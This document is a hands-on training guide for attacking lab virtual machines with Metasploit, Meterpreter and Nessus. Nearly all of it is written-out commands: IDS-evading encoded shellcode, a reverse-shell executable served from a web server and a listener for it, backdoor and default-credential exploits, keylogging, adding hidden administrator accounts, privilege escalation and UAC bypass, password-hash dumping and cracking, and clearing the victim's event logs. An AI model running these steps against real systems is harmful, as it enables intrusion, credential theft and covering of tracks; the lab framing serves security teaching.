**********************************************
Straightforward Training™
Using Metasploit/Meterpreter/Nessus (Advance)
Author: Saulo S. Ortiz
Date: 20180602
Updated 20180707
**********************************************

DISCLAIMER
1.	The steps gathered in this guide come from several different sources which are freely available throughout the internet.

2.	As always, I am not responsible for any issues/damages to hardware or software by using any of the software mentioned in
this guide nor by following it…do so at your own risk. I have tested these steps myself and found no issues/damage to my own
systems. Also I am not responsible for software links, software availability or condition.

3.	You will need to have some common Linux knowledge to be able to follow this guide, like what an .iso file is, installing
and configuring your Linux distro in a VM as well as basic VM knowledge. I will not be covering steps in deep detail. This
guide is NOT for people that have no idea how to install, remove, update/upgrade, and configure Linux/Windows OS or VMs.

-------------------------------------------------------------------------------------------------------------------------------
Note: If you don’t save the state of the VMs you will need to go through the process of starting the database service then, any
other services where you left off
-------------------------------------------------------------------------------------------------------------------------------

WHAT YOU’LL NEED
1.	A host computer with minimum:
	a.	500GB hard drive space
	b.	8GB memory
	c.	6 core CPU
	d.	Best: 16GB RAM or better, 6-8 core CPU or better
2.	Kali .ovm for VMware or OracleVirtualbox (not .iso), Mint or Kubuntu (.iso)
3.	Nessus (7.1.0-ubuntu1110_amd64.deb)
4.	VMWare Workstation 12 or higher or latest OracleVirtualBox
5.	Metasploitable2 – Linux (https://www.vulnhub.com/entry/metasploitable-2,29/)
6.	Windows XP and Windows 7 .iso files


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #1: SETUP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.	Download and install your VM program

2.	Download the Linux distro you want and create a VM for it and for metasploit using the configuration setup below

3.	If using Mint or Kubuntu
	a.	Create a VM with 2GB ram (2048) and 20GB hard drive
	b.	CPU should be 1 CPU with 2 cores
	c.	Go to Advance and set the hdd to Independent then Persistent
	d.	128MB video
	e.	NAT network
	f.	Run your distro, log-in, then do an update and upgrade
		i.	…this will take long while to complete

4.	If using Kali .ovm VM
	a.	Open the VM program and Import the file
	b.	Reduce the memory to 2GB
	c.	Change the CPU to 1 CPU, 2 cores
	d.	The hdd is already set to 80GB…nothing we can do about it
	e.	Go to Advance and set the hdd to Independent then Persistent
	f.	Log-in to Kali and do an update and upgrade also
		i.	…this will take long time to complete

5.	Install Metasploit-Framework for Kubuntu or Mint
	a.	Type sudo apt-get update
	b.	Type sudo apt-get install postgresql
	c.	Type cd /opt
	d.	Type sudo wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
	e.	Type sudo mkdir metasploit
	f.	Type sudo chmod +x ./metasploit-latest-linux-x64-installer.run
	g.	Type sudo ./metasploit-latest-linux-x64-installer.run

6.	Metasploitable2 VM setup
	a.	512MB memory
	b.	1 CPU with 1 core
	c.	8GB hdd

7.	Download Nessus
	a.	https://www.tenable.com/downloads/nessus

8.	Installing the Nessus .deb file:
	a.	In a terminal screen navigate to /Downloads
	b.	Type dpkg –i <deb_file.deb>
		i.	…the file will unpack and install…remember to sudo if you’re not in Kali
		ii.	…once its installed make a note of the http link that shows on the screen…mine reads (https://kali:8834) yours could be
		different…this is important for later!!!

9.	Follow the instructions to start the Nessus service, then navigate to the https link in your browser
	a.	Select Advance button if it reads that your connection is not secure
	b.	Add exception… button
	c.	Confirm Security Exception button

10.	Create your login and password…you can use a disposable email like 10minute email
	a.	Save this URL!
	b.	Select Home, Professional or Manage
	c.	Go to https://www.tenable.com/products/nessus-home
	d.	Wait about 8-10 minutes for plugin downloads to complete

-------------------------------------------------------------------------------------------------------------------------------
Note: When trying to do these steps after setup you’ll need to do the following:
1.	Start Nessus service: /etc/init.d/nessusd start
2.	Go to the https link as before
-------------------------------------------------------------------------------------------------------------------------------


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #2: INTRO TO METASPLOIT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Default login info is:
	•	Metaspoloit: msfadmin/msfadmin
	•	Kali: root/toor
Log-in and get the IP address for both…will need them soon!

-------------------------------------------------------------------------------------------------------------------------------
Note: rhost is the victim VM, lhost is Kali
-------------------------------------------------------------------------------------------------------------------------------

1.	Make sure the NIC in your Linux VM and in metasploit VM are both set to NAT before running them

2.	Use the default login information and identify the eth0 IP address of each…we’ll need it soon

3.	We want to save the data of everything we do in these steps to a database for later use and easy retrieval so we run the database service. While in your Linux distro
	a.	 Type service postgresql start

4.	Type msfconsole to start metasploit…in Kali you can click on the icon also

5.	To verify that msfconsole and the database are connected type db_status

-------------------------------------------------------------------------------------------------------------------------------
Note: Type help and the command to get more information about it
-------------------------------------------------------------------------------------------------------------------------------

6.	You can use the commands help, show, search and back. For example…search for the payload reverse_tcp
		i.	…you’ll get a huge list but we just want the one we mentioned

7.	You can copy and paste it then executed which will take you to that payload shell
	a.	Now type show options for a list of options that each payload has
		i.	…LHOST = local host
	b.	Type set lhost <kali_ip_address>
	c.	Type show options
	d.	Type back to return to the msfconsole shell
		i.	…the settings we just did will become null

-------------------------------------------------------------------------------------------------------------------------------
Note: Remember to use autocomplete using your Tab button
-------------------------------------------------------------------------------------------------------------------------------

8.	To set the same parameter globally:
	a.	Go back to the payload
	b.	Type setg lhost  <kali_ip_address>
		i.	…now when you back out of the payload shell this parameter will remain permanently
	c.	Type unsetg lhost to clear the global parameters
		i.	…you need to be inside the payload then:
	d.	Type unset lhost to unset the payload itself
		i.	…notice one command is unsetg the other is unset
	e.	Type back to return to the msfconsole shell

9.	You can also search for:
	a.	a platform: search platform:osx or search platform:windows
	b.	help search for author, bid, cve, etc…
	c.	or any post payloads as search platform:post

10.	Let’s load a common exploit:
	a.	Type search excel and select the one that reads FEATHEADER
	b.	Type show options
	c.	Type show payloads to see what else you can attach to this exploit
	d.	Type show advanced for any advance options
	e.	Type show evasion
		i.	…nothing shows up for this exploit but others may have info
	f.	Type show targets to see the targets you can use this against


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #3: CREATE A BIND SHELL PAYLOAD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.	Type use payload/windows/shell_bind_tcp
	a.	Type help
	b.	Type generate –h to see options
	c.	Type generate to generate a shell code

-------------------------------------------------------------------------------------------------------------------------------
Note: A bind_tcp_shell will bind us to a port on the target to get a shell.
-------------------------------------------------------------------------------------------------------------------------------

2.	Type setg rhost < metasploitable2_ip_address>
	a.	Type show options to view the parameters

3.	Type generate again
	a.	Notice the set parameters are in the payload

-------------------------------------------------------------------------------------------------------------------------------
Note: An IDS may be able to notice this payload and block it. If you knew which portion of this code triggers the IDS then you
can edit it by using the command. The most common bytes of this payload that can trigger an IDS are \xff and \x50.
-------------------------------------------------------------------------------------------------------------------------------

4.	Remove the triggers from the generated payload…
	a.	Type generate –b \xff\x50
		i.	…it will generate a new payload without these characters…but there’s a limit to how many you can remove before a payload cannot be generated
		ii.	…your payload size will change…keep an eye out for this

5.	Type show encoders and select x86/shikata_ga_nai then change the LPORT to 5555 and make the payload in BASH format
	a.	Type generate –e x86/shikata_ga_nai –b \xff –i 3 –o lport=5555 –t bash
		i.	…could not complete with \x50 in it
		ii.	…what’s the byte size?
		iii.	…you can use formats...go to help for these

-------------------------------------------------------------------------------------------------------------------------------
Note: -i 3 iterates the code 3 times…meaning, code and recode up to 3 times. This supposedly makes the payload harder to detect.
-------------------------------------------------------------------------------------------------------------------------------


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #4: OTHER MSFCONSOLE COMMANDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.	With workspace you can have multiple screens areas where you can run commands independent from others. Like using Shift + Ctrl + T.
	a.	Type workspace to see the default
	b.	Type workspace –a metasploitable
	c.	Type workspace again
	d.	Type workspace –h to see more options

2.	Type help to see other database commands

3.	You can connect to a database from here if you forgot to do it before running msf
	a.	Type db_connect –h and follow the instructions
	b.	Type db_import to pull scan from Nessus into metasploit
		i.	…you can run a loot are files gathered from an exploit
		ii.	…or you can run an nmap from msf
		iii.	…you can do an export to do backups
	c.	Type host then host –h to view the columns you want from the scan
		i.	…do not use space in between columns
		ii.	Ex. host –c mac,os_sp,info


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #5: USING METERPRETER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Meterpreter is a payload delivered through msfconsole that creates a shell in the target’s memory which doesn’t write anything
to the disc. In this section we’ll try to get a shell through the postgresql database running in metasploitable.

1.	While in msfconsole…
	a.	If you have not done so yet, set the global parameter of the remote host (rhost)…which is the metasploitable VM
	b.	Type setg rhost <metasploitable2_ip_address>

2.	Type nmap –n –sV <metasploitable2_ip_address>
		i.	…these are all the vulnerable ports and services running
	a.	Type search postgres
	b.	Type use exploit/linux/postgres/postgres_payload
	c.	Type show options

3.	Here we can see that the username is postgres and during research I found that the default login info for it is (postgres/postgres)
	a.	Set the password: set password postgres
	b.	Type show targets
	c.	Type show options
	d.	Type exploit or run
		i.	…if you’re doing this on different day, you may need  to set your global parameters again

4.	You should get a meterpreter prompt…this means you just created a shell in metasploit through the postgresql database and have control of the machine.

5.	Type help to check the options you have

6.	Use the background command which puts the current session in the background in metasploit so you can come back to it later or run other sessions

7.	Type sessions to view current sessions in metasploit and the target or sessions of multiple targets
	a.	Type sessions –h for additional session options
		i.	…type sessions –k # to kill a session
		ii.	…type sessions # to restart a session

8.	While in meterpreter…
	a.	Type cat /etc/passwd
	b.	Type ifconfig
	c.	Type netstat –an
	d.	Type arp
	e.	Type router
	f.	Type help and check the file system command list
	g.	Type ls and download the server.crt file
		i.	…using a second terminal screen in Kali check if you received the .crt file
	h.	Type help again and look at the core commands
		i.	…you can run post exploits
		i.	Type background
	j.	Type sessions …to find out the session number
	k.	Type sessions –i <session_number>
	l.	Type ps …to see the processes running
		i.	…you get even more info on what is running and get an idea what to do next
	m.	Type sysinfo

-------------------------------------------------------------------------------------------------------------------------------
Note: When you background a session it “kicks you out” and places that session in the background for later use…you’re not really
kicked out…it’s more like putting your call on-hold then you can come back to it without having to go through the entire connection
process. Do sessions to see how the session is set in the background.
-------------------------------------------------------------------------------------------------------------------------------

9.	Type exit to drop out of the meterpreter shell
		i.	…if you’re running processes you can Ctrl+C then exit


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #6: SCANNING WITH MSFCONSOLE (Part #1)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.	Type hosts then type services
		i.	…shows the last service which was postgreSQL

2.	Delete the host:
	a.	hosts –d <rhost_ip_address>

3.	Run nmap in msfconsole…
	a.	nmap –A < metasploitable2_ip_address>
		i.	…you can pipe the results to a .txt file and you can also grep it
		ii.	…you can also use the –vv to see verbose while scanning

-------------------------------------------------------------------------------------------------------------------------------
Note: We can see the following services are running with their ports: FTP, ssh, telnet, smtp, apache, rpcbind, netbios (Samba),
a remote shell, a root shell, java, another FTP, MySQL, VNC, x11, unreal gaming server irc, two more apache servers, MAC address,
etc. Lots of things to exploit!
-------------------------------------------------------------------------------------------------------------------------------

4.	Let’s populate the database with the nmap info we captured so we can search through it easier…
	a.	Type db_nmap –A < metasploitable2_ip_address>
	b.	Type hosts
		i.	…now we see the host info
	c.	Type services -u …to see what services it discovered
	d.	Type services –h for more info

5.	Type search portscan
	a.	Type use auxiliary/scanner/portscan/tcp
	b.	Type show options
	c.	Type setg rhosts <metasploitable2_ip_address>
		i.	…notice this command uses rhosts and not rhost to set the IP address
	d.	Type exploit or run
		i.	…once the scan is done, we’ll see the open TCP ports

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #7: SCANNING WITH MSFCONSOLE (Part #2)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Using the command services –u (same as services) we can see what programs the target has running and we can scan and exploit. Once you have a target always use this command!
1.	Go back then use /auxiliary/scanner/mysql/mysql_version to scan MySQL for its version
	a.	Type options and check rhost is set
	b.	Type run
		i.	…see program version

2.	Go back then use auxiliary/scanner/postgres/postgres_version for its version
	a.	Type options and check the rhost and password are set
	b.	Type run

3.	Go back then use auxiliary/scanner/postgres/postgres_hashdump
	a.	Type options
	b.	Type run
		i.	…you’ll see the hash for the postgres user

4.	Go back then use auxiliary/scanner/postgres/postgres_schemadump
	a.	Type options
	b.	Type run
		i.	…its shows the host and port
		ii.	…no columns or rows but if it were populated you could read them and have a better idea of the database

5.	Type services –u again to see the list of programs running in the metasploitable (target)

6.	Type search vsftp to see if we can find a module to this program

7.	Type use exploit/unix/ftp/vsftp_234_backdoor
	a.	Type options
	b.	Type run or exploit
		i.	…screen will be blank, but…
	c.	Type ls
	d.	Type cd home
	e.	Type ls –lah
	f.	Type cd msfadmin
	g.	Type ls –a
	h.	Use Ctrl+C to leave the ftp

8.	Type services –u
	a.	Type services -p 21 to see any services running on that port
		i.	…take a note on the columns

9.	Type services –p 21 –c proto, port, state
		i.	…shows you protocol, port and its state
		ii.	…try it using another port
		iii.	…if you want all info then omit the rest of the command after 21

-------------------------------------------------------------------------------------------------------------------------------
Note: At this point you can view every successful attempt by typing creds. This information is stored in the database and shows
your successful connections along with important information.
-------------------------------------------------------------------------------------------------------------------------------

10.	Go back then type services

11.	Do a search vnc
		i.	…we want to use a module from the scanner folder
	a.	Type search scanner/vnc to narrow your output

12.	Type use auxiliary/scanner/vnc/vnc_none_auth
	a.	Type options
		i.	...check the rhosts info
	b.	Type run or exploit
		i.	…it found the VNC protocol version [3,  4]…you can also see this using services
		ii.	…it did not find it to have a blank password authentication
		iii.	…continue to identify how to get in using the data you see here and also using services -u

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #8: WEB APPLICATION VULNERABILITY SCANNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.	Go back then type services

2.	Using the browser we’ll see what we can see under the IP address and port 80…what program in the list is the one using port 80?
	a.	In the browser type the target’s IP address…what do you see here?
		i.	…these links connect to vulnerable web applications!

3.	Type load wmap framework plugin
		i.	…this is a webcrawler

4.	Type help and scroll up until you see map Commands

5.	Type wmap _sites
		i.	…check out the options

6.	Type wmap_sites –a <http://metasploit_IP_address>
		i.	…this command adds a website to metasploit
	a.	Type wmap_sites –l to see if it was created

7.	Type wmap_targets –h

8.	Type wmap_targets –t <http://metasploit_IP_address>

9.	Type wmap_targets –l
		i.	…you can also add SSL

10.	Type wmap_run –h

11.	Type wmap_run –t
		i.	…used to ID any enabled modules
		ii.	…the modules can be used against the website we initially set up

12.	Type wmap_run –e
		i.	…to launch all the modules against the contents on the root folder of metasploit and see what vulnerabilities it can find

13.	Type wmap_vulns –l
		i.	…it displays all the vulnerabilities found


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #9: SCANNING WITH NESSUS (COMMAND LINE)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We can connect to Nessus via the web browser or though msfconsole...we’ll start with the console.
1.	Ctrl+L to clear then exit msfconsole

2.	Run Nessus…
	a.	Type /etc/init.d/nessus start
	b.	Check if its running using service --status-all | grep ness
		i.	…you can also use service nessusd start
		ii.	…and check with service nessusd status

3.	Type msfconsole to go back into it

4.	Type load nessus
		i.	…it should say successfully loaded, if not, check if its running or if its installed

5.	Type nessus_help to check any options

6.	Let try and connect to Nessus via the terminal…
	a.	Type nessus_connect –h for more options on how to connect

7.	Now let’s save our Nessus credentials…do not do this on a real network or in an open network…do all in a VM network in NAT
	a.	Type nessus_save <username/password>
	b.	Type ifconfig and find the IP address if you do not have it already
	c.	Type nessus_connect <username:password>@<host_ip>:8834
		i.	…it should read user authenticated successfully
		ii.	…you may need to add at the end ssl_ignore if you have SSL errors
	d.	Type nessus_help
	e.	Type nessus_user_list
	f.	Type nessus_admin

-------------------------------------------------------------------------------------------------------------------------------
Note: As this is a brand new Nessus installation there will be no policies available, therefore you need to create some via the
GUI before we can continue.
-------------------------------------------------------------------------------------------------------------------------------

8.	Go to the browser and type https:<host_ip_address>:8834
	a.	Use your login and password
	b.	On the left side menu select Policies
	c.	On the middle screen select Create a new policy
	d.	Select Basic Scan then name basic_scan then save it

9.	Back at the terminal screen type nessus_policy_list

10.	Type nessus_scan_new…noticed its missing info to run it

11.	Type nessus_policy_list and copy the UUID to memory

12.	Type nessus_scan_new <UUID_#> test test <host_ip_address>
	a.	Or type nessus_scan_new <UUID_#> test test <host_ip_range>/24
		i.	…you’ll need the entire UUID number

-------------------------------------------------------------------------------------------------------------------------------
Note: Take note of the Scan ID because you did not launched the scan you just create a scan in queue
-------------------------------------------------------------------------------------------------------------------------------

13.	Type nessus_scan_launch <scan_ID>
		i.	…should reads scan successfully launched

14.	Type nessus_scan_list …to see a list of scans and their status…this will take  while
	a.	Type nessus_scan_list again to see if the scan completed
		i.	…take note of the Scan ID

15.	Type nessus_report_hosts <scan_ID> -S
		i.	…it will show you the finding % with the found hosts
		ii.	…take note of the Host ID also

16.	Type nessus_report_vulns <scan_ID>
		i.	…it will show you the vulnerabilities found

17.	Let’s import the scan to metasploit…
	a.	Type nessus_db_import <scan_ID>
	b.	Type hosts
	c.	Type vulns <host_ip_address>
		i.	…it shows you the vulnerabilities for the host and if you use the browser it will show you the colorful graphic representation
		ii.	…use the metasploitable IP address
	d.	Use Ctrl+L to clear the screen

-------------------------------------------------------------------------------------------------------------------------------
Note: Of course you can do all this via the GUI and it would be faster and easier…I just wanted you to use the terminal screen
to see it also works.
-------------------------------------------------------------------------------------------------------------------------------


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #10: HACKING A TOMCAT SERVER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.	Type search tomcat
	a.	Type use auxiliary/scanner/http/tomcat_mgr_login

2.	Type use auxiliary/scanner/http/tomcat_mgr_login
	a.	Type options
	b.	Type setg rhosts <metasploitable2_ip_address>
		i.	…if not already set
	c.	Type set login tomcat
	d.	Type set password tomcat
	e.	Type set rport 8180
	f.	Type set blank_passwords true
	g.	Type run or exploit
		i.	…check for the green plus sign [+]

3.	Verify the credentials information
	a.	Type creds

4.	Open the browser and type the <metasploitable2_ip_address>:8180
	a.	Click on Status link
	b.	Scroll down to the header http-8180 and verify the Client connected to the VHost which is kali to tomcat server
	c.	You can now close the browser and exit the scanner


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #11: GETTING A REVERSE SHELL/ESCALATING RIGHTS IN WINDOWS XP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For this exercise you will need a Windows XP to be the “victim”. You can easily find an .iso on the internet even if it’s a 30 day trial version.

1.	Setup the XP VM using 1 CPU and 1GB ram
	a.	If you’re using Oracle VirtualBox setup the Video to 128MB

2.	Use msfvenom tool to generate the payload…
	a.	Type msfvenom --help-formats to view a list of formats for your payload
	b.	Type msfvenom –p windows/meterpreter/reverse_tcp LHOST= <kali_ip_address> LPORT =443 –f exe –o evilfile.exe
		i.	…you can substitute -o with >
		ii.	…ignore the “No encoder or badchars" comment
		iii.	LPORT and LHOST can be written in lowercase

3.	Start the Apache webserver
	a.	Type service apache2 start
	b.	Type service apache2 status to verify

4.	Take the evilfile.exe created and copy it to the /var/www/html folder
	a.	Type cp evilfile.exe /var/www/html
		i.	…you can also create the payload directly into /var/www/html

5.	Using the msfconsole…
	a.	Type msfconsole
	b.	Type use exploit/multi/handler
	c.	Type set payload windows/meterpreter/reverse_tcp
	d.	Type set lhost <kali_ip_address>
	e.	Type set lport 443
	f.	Type options
	g.	Type save
		i.	…it saves this work in the postgresql db for later use…like a save in games
	h.	Type run or exploit
		i.	…it will be in listening mode

6.	Run your Windows VM “victim” machine
	a.	Check the IP address using the cmd prompt to make sure you’re in the same range as the Kali machine
	b.	If you are, open a browser and type <kali_ip_address>
		i.	…you should see the “Apache2 Debian Default Page”
	c.	Type <kali_ip_address>/evilfile.exe
		i.	…once the file downloads run it

-------------------------------------------------------------------------------------------------------------------------------
Note: If you have problems downloading the file from Kali to your Windows VM then just do a transfer using a USB from one VM to
another. You can use the top menu in your VM program (not the VM machine) to connect and disconnect the USB from one VM to the
other. Also, depending on the VM software you are using there are several ways to do this and you may need additional software
for the VM program itself. Google the problem if you’re stuck…this is the best way to troubleshoot and learn.
-------------------------------------------------------------------------------------------------------------------------------

7.	Run the evilfile.exe file in the victim’s machine

8.	Back in Kali…a meterpreter prompt should show up in the same terminal screen you ran msfconsole from

9.	Here you can run several cool things like:
	a.	Type help
		i.	…you get a menu with all of the options you can use
	b.	Type screenshot
		i.	…if it saves to your VM then the victim user has admin rights!
	c.	Type getuid
		i.	…this gives you the username of the victim
	d.	Type keyscan_start
		i.	…this is a keylogger for anything the user types or clicks on, it will capture everything!
	e.	Type keyscan_dump
		i.	…this will dump the file with the captured info
	f.	Type shell
		i.	…this will give you a cmd prompt shell inside meterpreter that you can use to run MS commands in the victim’s system
	g.	Type net user
		i.	…you can see the users
	h.	Type net user evildoer P@$$w0rd! /add
		i.	…yep, you now have an account in that machine! (((Muahahahahaa!!)))
	i.	Type net localgroup Administrators evildoer /add
		i.	…you now have admin rights! (((maniacal laugh…maniacal laugh!)))

10.	Type exit to go back to the meterpreter prompt

11.	As Admin we can now let’s elevate our privileges one level higher to System
	a.	Type getsystem
	b.	Type getuid
		i.	…it states: “Server username: NT AUTHORITY\SYSTEM.” Here we can do anything we want…run programs through the cmd prompt of delete files! (((I’m about to pass out from all the evil laughing!)))

12.	Let’s try and get a hash dump to get into the system’s SAM file which holds all users and their keys…this may disconnect you
	a.	Type run hashdump
		i.	…you now have the SAM file with users and keys
		ii.	…the first part before of the hash (before the colon) is not as important anymore because there are not a lot of XP systems in the wild unless you
		count ATM machines; the second part you can use against a rainbow table program or an online rainbow table website

-------------------------------------------------------------------------------------------------------------------------------
Note: Take a look at the SID numbers in the hash dump…what is 500 and 501? Google what they mean.
-------------------------------------------------------------------------------------------------------------------------------

13.	Copy the second part of the hash and just before the triple colons for the evildoer user
	a.	Then open your browser and go to https://hashkiller.co.uk/ntlm-decrypter.aspx
	b.	Use Ctrl+C to paste the hash in it
	c.	Scroll down and enter the CAPTCHA then hit the submit button
	d.	Scroll up and verify your hash was found…it will also spell it on the right side box

14.	Since you now have the hash dump you can take all of them and save them with notepad++ so you can run them through rainbow tables

15.	To prevent the connection from begin dropped we’ll move the session to that machine to maintain the connection
	a.	Go to the XP VM and open Task Manager
	b.	Look for the evildoer process

16.	Go back to Kali and while in meterpreter…
	a.	Type run post/windows/manage/migrate
		i.	…it will display a new program in memory possible notepad
	b.	Go back to the XP VM and look for evildoer
		i.	…notice that the process has been changed to notepad.exe and evildoer is no longer in the processes

17.	Go back to Kali…it will show a “session 1 closed. Reason: Died” message
	a.	Type dir
		i.	…you will get the directory from the Windows VM machine
	b.	Type shell
		i.	...it will show you a “Failed to spawn” error but it will connect anyway
	c.	Type exit

18.	Type clearev
		i.	…clears the Application, System and Security logs at the victim’s machine…not really stealthy but will do the job

-------------------------------------------------------------------------------------------------------------------------------
Note: Optional…another useful command to use while in shell is sc. Use it to communicate with the Service Control Manager and the services
-------------------------------------------------------------------------------------------------------------------------------


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #12: GETTING A REVERSE SHELL/ESCALATING RIGHTS IN WINDOWS 7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For this exercise you will need a Windows 7 VM to be the “victim”. You can easily find an .iso on the internet even if it’s a 30 day trial version.

1.	Setup the Windows 7 VM using 1 CPU with 2 cores and 2GB ram, 4GB if you can spare it is best
	a.	If you’re using Oracle VirtualBox setup the Video to 128MB
		i.	…by default the screen shuts down in 10 minutes and the system in 30 minutes…find where to change this to never.

2.	Use msfvenom tool to generate the payload…
	a.	Type msfvenom --help-formats to view a list of formats for your payload
	b.	Type msfvenom –p windows/meterpreter/reverse_tcp LHOST= <kali_ip_address> LPORT =443 –f exe –o evilfile.exe
		i.	…you can substitute -o with >
		ii.	…ignore the “No encoder or badchars" comment

3.	Start the Apache webserver…
	a.	Type service apache2 start
	b.	Type service apache2 status to verify

4.	Take the evilfile.exe created and copy it to the /var/www/html folder
	a.	Type cp evilfile.exe /var/www/html
		i.	…you can also create the payload directly into /var/www/html

5.	Using the msfconsole…
	a.	Type msfconsole
	b.	Type use exploit/multi/handler
	c.	Type set payload windows/meterpreter/reverse_tcp
	d.	Type set lhost <kali_ip_address>
	e.	Type set lport 443
	f.	Type options
	g.	Type save
		i.	…it saves this work in the postgresql db for later use…like a save in games
	h.	Type run or exploit
		i.	…meterpreter is in listening mode

6.	Run your Windows 7 VM “victim” machine
	a.	Check the IP address using the cmd prompt to make sure you’re in the same range as the Kali machine
	b.	If you are, open a browser and type <kali_ip_address>
		i.	…you should see the “Apache2 Debian Default Page”
	c.	Type <kali_ip_address>/evilfile.exe
		i.	…once the file downloads run it

-------------------------------------------------------------------------------------------------------------------------------
Note: If you have problems downloading the file from Kali to your Windows VM then just do a transfer using a USB stick from one
VM to another. You can use the top menu in your VM program (not the VM machine) to connect and disconnect the USB from one VM
to the other. Also, depending on the VM software you are using there are several ways to do this and you may need additional
software for the VM program itself. Google the problem if you’re stuck…that’s the best way to troubleshoot and learn.
-------------------------------------------------------------------------------------------------------------------------------

7.	Run the evilfile.exe file in the victim’s machine, then in a meterpreter prompt should show up in Kali on the same terminal you ran msfconsole from

8.	Here you can run several cool things like:
	a.	Type help
		i.	…you get a menu with all of the options you can use
	b.	Type screenshot
		i.	…if it saves to your VM then the victim user has admin rights!
	c.	Type getuid
		i.	…this gives you the username of the victim
	d.	Type keyscan_start
		i.	…this is a keylogger for anything the user types or clicks on, it will capture everything!
	e.	Type keyscan_dump
		i.	…this will dump the file with the captured info
	f.	Type shell
		i.	…this will give you a cmd prompt shell inside meterpreter that you can use to run MS commands in the victim’s system
	g.	Type exit to exit out of the shell

9.	Set the current session to background
	a.	Type background

10.	Privilege escalation in Windows 7 is a bit trickier than in XP but not by much. There are several ways to do escalation but I will not cover them all here. If you want to learn more about it then use your Googlefu skills.

11.	Verify the number of the session in the background and if there are any old sessions kill them
	a.	Type sessions
	b.	Type sessions –k #
		i.	…if you have any old/unused sessions

12.	Back in msfconsole…
	a.	Type use exploit/windows/local/bypassuac
	b.	Type set session 1
		i.	…this number must match the session Id from the previous exploit!!!!
	c.	Type run or exploit
		i.	…you will get a new meterpreter reverse shell

-------------------------------------------------------------------------------------------------------------------------------
Note: If you get a UAC Disabled error then that means that the security setting in the Action Center is set to OFF. This is not
good for any user as anything will install without them knowing. Also this is not the default security setting for it.
-------------------------------------------------------------------------------------------------------------------------------

13.	Now to escalate our privileges in this computer through the current user’s account!
	a.	Type getuid
		i.	…the computer name and user info is displayed
	b.	Type getsystem
		i.	…do you see “Named Pipe Impersonation” on screen?! (((Muahahahaa!)))
	c.	Type getuid
		i.	…it should read NT AUTHORITY\SYSTEM…now we can execute programs through the cmd prompt! (((even more Muahahahaa!)))

14.	At this point you can manually add or delete any user you want. We can do this by doing the following:
	a.	Type shell to go back into the Windows shell
	b.	Type net user evildoer P@$$W0rd! /add
	c.	Type net user to verify

15.	But let’s say you want to upload files with payloads and run them to create new accounts
	a.	Type net user evildoer /delete
	b.	Type background
		i.	… Place the current session to background

16.	Create a new payload to add another user to the machine
	a.	Type use windows/adduser
	b.	Type options
	c.	Type set user evildoer
	d.	Type set pass P@$$w0rd!
	e.	Type set wmic true
	f.	Type generate –t exe –f payload.exe
	g.	Type ls to view file

17.	Type sessions …to view the session list
	a.	Type sessions # (where # is the Id number of that session)

18.	Before we continue we load the incognito module
	a.	Type use incognito
		i.	…used to impersonate another user tokens so we can access systems and networks without having to provide credentials each time you access a file

19.	Upload the payload to the victim’s machine. My original evildoer file which gave use the meterpreter shell was in the Downloads folder therefore when
I upload this file it will go to that folder…
	a.	Type pwd to find out where you are in the victim’s directory
	b.	Type upload –f payload.exe c:\\users\\<username>\\downloads
		i.	…no, the \\ are NOT typos…check the message after uploading to see how they work
	c.	Type shell then cd c:\users\<username>\downloads
		i.	…username will be the current user you’re using
	d.	Type dir to see the contents of the folder

-------------------------------------------------------------------------------------------------------------------------------
Note: If you misplace an uploaded file use the where command in Windows shell to find its location
